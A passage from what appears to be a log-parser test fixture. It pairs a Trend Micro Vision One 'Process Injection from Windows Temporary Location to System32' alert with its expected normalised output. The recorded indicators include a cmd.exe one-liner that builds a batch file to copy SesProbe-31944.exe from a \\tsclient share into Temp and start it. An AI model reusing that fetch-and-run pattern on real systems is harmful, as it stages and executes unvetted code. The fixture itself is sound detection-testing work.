S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Process Injection from Windows Temporary Location to System32", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T07:49:48Z", + "host": { + "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "ip": [ + "19.112.87.74" + ], + "name": "CHTX-XMEDICA-2K12.windows10.local" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "SesProbe-31944.exe ", + "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "hash": { + "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "sha256": 